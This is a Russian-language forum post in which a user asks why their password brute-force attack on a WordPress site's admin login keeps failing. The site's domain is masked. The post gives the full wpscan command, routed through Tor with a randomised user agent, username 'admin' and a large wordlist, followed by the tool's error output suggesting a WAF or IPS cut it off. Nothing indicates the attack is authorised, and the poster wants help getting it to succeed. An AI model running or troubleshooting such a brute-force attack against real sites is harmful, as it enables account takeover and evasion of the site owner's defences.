Ошибка при брутфорсе сайта на wordpress ¶
By: e240 on 2016-12-05 18 ч.
Ошибка при брутфорсе сайта на wordpress
Руководствуясь манами и гайдами по wpscan брутфорсю админку wpЮ команда для брута такая:
# wpscan --url http:/******.com/wp-login.php --random-agent --proxy socks5://127.0.0.1:9050 --username admin --wordlist /root/pl.txt
__________________________
Но на половине процесса почему то вылазиет такая ошибка:
[!] ERROR: No response from remote server. WAF/IPS? (Couldn't connect to server)
[!] ERROR: No response from remote server. WAF/IPS? (Couldn't connect to server)
[!] ERROR: No response from remote server. WAF/IPS? (Couldn't connect to server)
Brute Forcing 'admin' Time: 00:01:16 < > (35 / 47605) 0.07% ETA: 28:51:28
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | admin | | |
+----+-------+------+----------+
[!] The target seems to be down
/usr/share/wpscan/lib/wpscan/wpscan_helper.rb:127:in `block in <top (required)>': The target seems to be down (RuntimeError)
from /usr/lib/ruby/vendor_ruby/typhoeus/request/callbacks.rb:128:in `block in execute_callbacks'
from /usr/lib/ruby/vendor_ruby/typhoeus/request/callbacks.rb:127:in `each'
from /usr/lib/ruby/vendor_ruby/typhoeus/request/callbacks.rb:127:in `execute_callbacks'
from /usr/lib/ruby/vendor_ruby/typhoeus/request/operations.rb:35:in `finish'
from /usr/lib/ruby/vendor_ruby/typhoeus/easy_factory.rb:159:in `block in set_callback'
from /usr/lib/ruby/vendor_ruby/ethon/easy/response_callbacks.rb:65:in `block in complete'
from /usr/lib/ruby/vendor_ruby/ethon/easy/response_callbacks.rb:65:in `each'
from /usr/lib/ruby/vendor_ruby/ethon/easy/response_callbacks.rb:65:in `complete'
from /usr/lib/ruby/vendor_ruby/ethon/multi/operations.rb:151:in `check'
from /usr/lib/ruby/vendor_ruby/ethon/multi/operations.rb:164:in `run'
from /usr/lib/ruby/vendor_ruby/ethon/multi/operations.rb:43:in `perform'
from /usr/lib/ruby/vendor_ruby/typhoeus/hydra/runnable.rb:15:in `run'
from /usr/lib/ruby/vendor_ruby/typhoeus/hydra/memoizable.rb:51:in `run'
from ./wpscan.rb:470:in `ensure in main'
from ./wpscan.rb:470:in `main'
from ./wpscan.rb:474:in `<main>'
В чем может быть проблема? Я не так запускаю брутфорс?